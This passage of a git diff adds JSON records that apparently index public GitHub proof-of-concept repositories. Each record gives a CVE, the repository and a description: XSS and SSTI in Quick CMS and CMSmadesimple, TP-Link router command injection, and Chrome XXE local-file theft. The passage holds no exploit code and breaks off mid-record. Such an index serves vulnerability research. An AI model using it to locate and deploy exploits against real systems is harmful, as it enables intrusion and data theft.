@@ -0,0 +1,32 @@
+[
+ {
+ "id": 693029467,
+ "name": "CVE-2023-43342-Quick-CMS-Stored-XSS---Languages-Frontend",
+ "full_name": "sromanhu\/CVE-2023-43342-Quick-CMS-Stored-XSS---Languages-Frontend",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43342-Quick-CMS-Stored-XSS---Languages-Frontend",
+ "description": "Quick CMS 6.7 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Frontend- Pages in the Languages Menu.",
+ "fork": false,
+ "created_at": "2023-09-18T07:51:26Z",
+ "updated_at": "2023-09-28T22:33:06Z",
+ "pushed_at": "2023-09-21T12:05:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43343.json b/2023/CVE-2023-43343.json
new file mode 100644
index 0000000000..8bdc5ce428
--- /dev/null
+++ b/2023/CVE-2023-43343.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 693015649,
+ "name": "CVE-2023-43343-Quick-CMS-Stored-XSS---Pages-Files",
+ "full_name": "sromanhu\/CVE-2023-43343-Quick-CMS-Stored-XSS---Pages-Files",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43343-Quick-CMS-Stored-XSS---Pages-Files",
+ "description": "Quick CMS 6.7 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Files - Description in the Pages Menu.",
+ "fork": false,
+ "created_at": "2023-09-18T07:16:18Z",
+ "updated_at": "2023-09-28T22:33:23Z",
+ "pushed_at": "2023-09-21T12:08:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43344.json b/2023/CVE-2023-43344.json
new file mode 100644
index 0000000000..07fc3ddb3a
--- /dev/null
+++ b/2023/CVE-2023-43344.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 693027301,
+ "name": "CVE-2023-43344-Quick-CMS-Stored-XSS---SEO-Meta-description",
+ "full_name": "sromanhu\/CVE-2023-43344-Quick-CMS-Stored-XSS---SEO-Meta-description",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43344-Quick-CMS-Stored-XSS---SEO-Meta-description",
+ "description": "Quick CMS 6.7 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the SEO- Meta description in the Pages Menu.",
+ "fork": false,
+ "created_at": "2023-09-18T07:46:02Z",
+ "updated_at": "2023-09-28T22:33:43Z",
+ "pushed_at": "2023-09-21T12:07:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43345.json b/2023/CVE-2023-43345.json
new file mode 100644
index 0000000000..b3d2d83e3b
--- /dev/null
+++ b/2023/CVE-2023-43345.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 693025701,
+ "name": "CVE-2023-43345-Quick-CMS-Stored-XSS---Pages-Content",
+ "full_name": "sromanhu\/CVE-2023-43345-Quick-CMS-Stored-XSS---Pages-Content",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43345-Quick-CMS-Stored-XSS---Pages-Content",
+ "description": "Quick CMS 6.7 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Content- Name in the Pages Menu.",
+ "fork": false,
+ "created_at": "2023-09-18T07:41:33Z",
+ "updated_at": "2023-09-28T22:34:01Z",
+ "pushed_at": "2023-09-21T12:07:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43346.json b/2023/CVE-2023-43346.json
new file mode 100644
index 0000000000..bd6a3f37dd
--- /dev/null
+++ b/2023/CVE-2023-43346.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 693030903,
+ "name": "CVE-2023-43346-Quick-CMS-Stored-XSS---Languages-Backend",
+ "full_name": "sromanhu\/CVE-2023-43346-Quick-CMS-Stored-XSS---Languages-Backend",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43346-Quick-CMS-Stored-XSS---Languages-Backend",
+ "description": "Quick CMS 6.7 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Backend- Dashboard in the Languages Menu.",
+ "fork": false,
+ "created_at": "2023-09-18T07:55:10Z",
+ "updated_at": "2023-09-28T22:34:19Z",
+ "pushed_at": "2023-09-21T12:06:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43352.json b/2023/CVE-2023-43352.json
new file mode 100644
index 0000000000..ffbd26d7c7
--- /dev/null
+++ b/2023/CVE-2023-43352.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 692736626,
+ "name": "CVE-2023-43352-CMSmadesimple-SSTI--Content",
+ "full_name": "sromanhu\/CVE-2023-43352-CMSmadesimple-SSTI--Content",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43352-CMSmadesimple-SSTI--Content",
+ "description": "SSTI vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to use native template syntax to inject a malicious payload into a template, which is then executed server-side",
+ "fork": false,
+ "created_at": "2023-09-17T12:35:39Z",
+ "updated_at": "2023-09-28T22:34:41Z",
+ "pushed_at": "2023-09-21T12:18:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43353.json b/2023/CVE-2023-43353.json
new file mode 100644
index 0000000000..932290afaa
--- /dev/null
+++ b/2023/CVE-2023-43353.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 692732972,
+ "name": "CVE-2023-43353-CMSmadesimple-Stored-XSS---News---Extra",
+ "full_name": "sromanhu\/CVE-2023-43353-CMSmadesimple-Stored-XSS---News---Extra",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43353-CMSmadesimple-Stored-XSS---News---Extra",
+ "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Extrain the Content - News Menu.",
+ "fork": false,
+ "created_at": "2023-09-17T12:21:12Z",
+ "updated_at": "2023-09-28T22:34:59Z",
+ "pushed_at": "2023-09-21T12:23:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43354.json b/2023/CVE-2023-43354.json
new file mode 100644
index 0000000000..27513421c7
--- /dev/null
+++ b/2023/CVE-2023-43354.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 692730333,
+ "name": "CVE-2023-43354-CMSmadesimple-Stored-XSS---MicroTIny-extension",
+ "full_name": "sromanhu\/CVE-2023-43354-CMSmadesimple-Stored-XSS---MicroTIny-extension",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43354-CMSmadesimple-Stored-XSS---MicroTIny-extension",
+ "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Profile in the MicroTIny Menu.",
+ "fork": false,
+ "created_at": "2023-09-17T12:10:54Z",
+ "updated_at": "2023-09-28T22:35:16Z",
+ "pushed_at": "2023-09-21T12:24:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43355.json b/2023/CVE-2023-43355.json
new file mode 100644
index 0000000000..92c7f13e81
--- /dev/null
+++ b/2023/CVE-2023-43355.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 692734818,
+ "name": "CVE-2023-43355-CMSmadesimple-Reflected-XSS---Add-user",
+ "full_name": "sromanhu\/CVE-2023-43355-CMSmadesimple-Reflected-XSS---Add-user",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43355-CMSmadesimple-Reflected-XSS---Add-user",
+ "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the password and password again in the My Preferences - Add user",
+ "fork": false,
+ "created_at": "2023-09-17T12:28:23Z",
+ "updated_at": "2023-09-28T22:35:45Z",
+ "pushed_at": "2023-09-21T12:19:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43356.json b/2023/CVE-2023-43356.json
new file mode 100644
index 0000000000..a2a148aafd
--- /dev/null
+++ b/2023/CVE-2023-43356.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 692725247,
+ "name": "CVE-2023-43356-CMSmadesimple-Stored-XSS---Global-Settings",
+ "full_name": "sromanhu\/CVE-2023-43356-CMSmadesimple-Stored-XSS---Global-Settings",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43356-CMSmadesimple-Stored-XSS---Global-Settings",
+ "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Global Meatadata in the Settings- Global Settings Menu.",
+ "fork": false,
+ "created_at": "2023-09-17T11:50:00Z",
+ "updated_at": "2023-09-28T22:36:00Z",
+ "pushed_at": "2023-09-21T12:26:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43357.json b/2023/CVE-2023-43357.json
new file mode 100644
index 0000000000..91545b74a4
--- /dev/null
+++ b/2023/CVE-2023-43357.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 692734079,
+ "name": "CVE-2023-43357-CMSmadesimple-Stored-XSS---Shortcut",
+ "full_name": "sromanhu\/CVE-2023-43357-CMSmadesimple-Stored-XSS---Shortcut",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43357-CMSmadesimple-Stored-XSS---Shortcut",
+ "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title in the My Preferences - Manage Shortcuts",
+ "fork": false,
+ "created_at": "2023-09-17T12:25:24Z",
+ "updated_at": "2023-09-28T22:36:24Z",
+ "pushed_at": "2023-09-21T12:20:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43358.json b/2023/CVE-2023-43358.json
new file mode 100644
index 0000000000..7f897f3e65
--- /dev/null
+++ b/2023/CVE-2023-43358.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 692732099,
+ "name": "CVE-2023-43358-CMSmadesimple-Stored-XSS---News",
+ "full_name": "sromanhu\/CVE-2023-43358-CMSmadesimple-Stored-XSS---News",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43358-CMSmadesimple-Stored-XSS---News",
+ "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title in the Content - News Menu.",
+ "fork": false,
+ "created_at": "2023-09-17T12:17:49Z",
+ "updated_at": "2023-09-28T22:36:39Z",
+ "pushed_at": "2023-09-21T12:23:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43359.json b/2023/CVE-2023-43359.json
new file mode 100644
index 0000000000..6dfdc9fd7d
--- /dev/null
+++ b/2023/CVE-2023-43359.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 692727411,
+ "name": "CVE-2023-43359-CMSmadesimple-Stored-XSS----Content-Manager",
+ "full_name": "sromanhu\/CVE-2023-43359-CMSmadesimple-Stored-XSS----Content-Manager",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43359-CMSmadesimple-Stored-XSS----Content-Manager",
+ "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to Page Specific Metadata and Smarty data in the Content Manager Menu.",
+ "fork": false,
+ "created_at": "2023-09-17T11:58:54Z",
+ "updated_at": "2023-09-28T22:36:55Z",
+ "pushed_at": "2023-09-21T12:26:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43360.json b/2023/CVE-2023-43360.json
new file mode 100644
index 0000000000..6edd49afea
--- /dev/null
+++ b/2023/CVE-2023-43360.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 692729326,
+ "name": "CVE-2023-43360-CMSmadesimple-Stored-XSS---File-Picker-extension",
+ "full_name": "sromanhu\/CVE-2023-43360-CMSmadesimple-Stored-XSS---File-Picker-extension",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43360-CMSmadesimple-Stored-XSS---File-Picker-extension",
+ "description": "Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Top Directory in the File Picker Menu.",
+ "fork": false,
+ "created_at": "2023-09-17T12:06:56Z",
+ "updated_at": "2023-09-28T22:37:11Z",
+ "pushed_at": "2023-09-21T12:25:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43364.json b/2023/CVE-2023-43364.json
new file mode 100644
index 0000000000..48d15a447c
--- /dev/null
+++ b/2023/CVE-2023-43364.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 792126842,
+ "name": "CVE-2023-43364-Exploit-CVE",
+ "full_name": "libertycityhacker\/CVE-2023-43364-Exploit-CVE",
+ "owner": {
+ "login": "libertycityhacker",
+ "id": 168156205,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168156205?v=4",
+ "html_url": "https:\/\/github.com\/libertycityhacker"
+ },
+ "html_url": "https:\/\/github.com\/libertycityhacker\/CVE-2023-43364-Exploit-CVE",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-26T03:09:09Z",
+ "updated_at": "2024-04-26T03:12:27Z",
+ "pushed_at": "2024-04-26T03:12:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43481.json b/2023/CVE-2023-43481.json
new file mode 100644
index 0000000000..97df618554
--- /dev/null
+++ b/2023/CVE-2023-43481.json
@@ -0,0 +1,34 @@
+[
+ {
+ "id": 690844082,
+ "name": "com.tcl.browser",
+ "full_name": "actuator\/com.tcl.browser",
+ "owner": {
+ "login": "actuator",
+ "id": 78701239,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4",
+ "html_url": "https:\/\/github.com\/actuator"
+ },
+ "html_url": "https:\/\/github.com\/actuator\/com.tcl.browser",
+ "description": "CVE-2023-43481 ",
+ "fork": false,
+ "created_at": "2023-09-13T02:03:34Z",
+ "updated_at": "2023-12-28T05:18:57Z",
+ "pushed_at": "2024-04-13T01:51:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-43481"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43482.json b/2023/CVE-2023-43482.json
new file mode 100644
index 0000000000..11f48a561c
--- /dev/null
+++ b/2023/CVE-2023-43482.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 779866606,
+ "name": "CVE-2023-43482",
+ "full_name": "Mr-xn\/CVE-2023-43482",
+ "owner": {
+ "login": "Mr-xn",
+ "id": 18260135,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4",
+ "html_url": "https:\/\/github.com\/Mr-xn"
+ },
+ "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2023-43482",
+ "description": "TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy Command injection Vulnerability",
+ "fork": false,
+ "created_at": "2024-03-31T02:04:34Z",
+ "updated_at": "2024-06-21T00:12:16Z",
+ "pushed_at": "2024-03-31T02:07:27Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4357.json b/2023/CVE-2023-4357.json
new file mode 100644
index 0000000000..ad330a9b05
--- /dev/null
+++ b/2023/CVE-2023-4357.json
@@ -0,0 +1,184 @@
+[
+ {
+ "id": 719987092,
+ "name": "CVE-2023-4357-Chrome-XXE",
+ "full_name": "xcanwin\/CVE-2023-4357-Chrome-XXE",
+ "owner": {
+ "login": "xcanwin",
+ "id": 14187349,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14187349?v=4",
+ "html_url": "https:\/\/github.com\/xcanwin"
+ },
+ "html_url": "https:\/\/github.com\/xcanwin\/CVE-2023-4357-Chrome-XXE",
+ "description": "[漏洞复现] 全球首款单文件利用 CVE-2023-4357 Chrome XXE 漏洞 EXP, 实现对访客者本地文件窃取. Chrome XXE vulnerability EXP, allowing attackers to obtain local files of visitors.",
+ "fork": false,
+ "created_at": "2023-11-17T10:32:31Z",
+ "updated_at": "2024-06-13T10:25:16Z",
+ "pushed_at": "2023-11-21T10:45:58Z",
+ "stargazers_count": 189,
+ "watchers_count": 189,
+ "has_discussions": false,
+ "forks_count": 33,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-4357"
+ ],
+ "visibility": "public",
+ "forks": 33,
+ "watchers": 189,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 720888487,
+ "name": "CVE-2023-4357-APT-Style-exploitation",
+ "full_name": "OgulcanUnveren\/CVE-2023-4357-APT-Style-exploitation",
+ "owner": {
+ "login": "OgulcanUnveren",
+ "id": 112496046,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112496046?v=4",
+ "html_url": "https:\/\/github.com\/OgulcanUnveren"
+ },
+ "html_url": "https:\/\/github.com\/OgulcanUnveren\/CVE-2023-4357-APT-Style-exploitation",
+ "description": "Apt style exploitation of Chrome 0day CVE-2023-4357",
+ "fork": false,
+ "created_at": "2023-11-19T22:20:10Z",
+ "updated_at": "2024-06-21T00:11:43Z",
+ "pushed_at": "2023-11-20T01:02:44Z",
+ "stargazers_count": 40,
+ "watchers_count": 40,
+ "has_discussions": false,
+ "forks_count": 20,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 20,
+ "watchers": 40,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 721463764,
+ "name": "CVE-2023-4357-APT-Style-exploitation",
+ "full_name": "passwa11\/CVE-2023-4357-APT-Style-exploitation",
+ "owner": {
+ "login": "passwa11",
+ "id": 112363374,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112363374?v=4",
+ "html_url": "https:\/\/github.com\/passwa11"
+ },
+ "html_url": "https:\/\/github.com\/passwa11\/CVE-2023-4357-APT-Style-exploitation",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-21T05:39:15Z",
+ "updated_at": "2023-11-21T05:39:35Z",
+ "pushed_at": "2023-11-21T05:39:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 725033535,
+ "name": "chrome-CVE-2023-4357",
+ "full_name": "sunu11\/chrome-CVE-2023-4357",
+ "owner": {
+ "login": "sunu11",
+ "id": 23350775,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23350775?v=4",
+ "html_url": "https:\/\/github.com\/sunu11"
+ },
+ "html_url": "https:\/\/github.com\/sunu11\/chrome-CVE-2023-4357",
+ "description": "poc",
+ "fork": false,
+ "created_at": "2023-11-29T09:52:36Z",
+ "updated_at": "2024-05-26T11:53:53Z",
+ "pushed_at": "2023-11-29T09:57:16Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 740847452,
+ "name": "CVE-2023-4357",
+ "full_name": "WinnieZy\/CVE-2023-4357",
+ "owner": {
+ "login": "WinnieZy",
+ "id": 15833215,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15833215?v=4",
+ "html_url": "https:\/\/github.com\/WinnieZy"
+ },
+ "html_url": "https:\/\/github.com\/WinnieZy\/CVE-2023-4357",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-09T07:31:29Z",
+ "updated_at": "2024-01-09T07:37:00Z",
+ "pushed_at": "2024-01-09T07:56:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 817801754,
+ "name": "CVE-2023-4357",
+ "full_name": "CamillaFranceschini\/CVE-2023-4357",
+ "owner": {
+ "login": "CamillaFranceschini",
+ "id": 32276847,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32276847?v=4",
+ "html_url": "https:\/\/github.com\/CamillaFranceschini"
+ },
+ "html_url": "https:\/\/github.com\/CamillaFranceschini\/CVE-2023-4357",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-20T13:20:43Z",
+ "updated_at": "2024-06-20T13:20:56Z",
+ "pushed_at": "2024-06-20T13:20:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43622.json b/2023/CVE-2023-43622.json
new file mode 100644
index 0000000000..f579e69ac8
--- /dev/null
+++ b/2023/CVE-2023-43622.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 807622468,
+ "name": "CVE-2023-43622",
+ "full_name": "visudade\/CVE-2023-43622",
+ "owner": {
+ "login": "visudade",
+ "id": 49928261,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49928261?v=4",
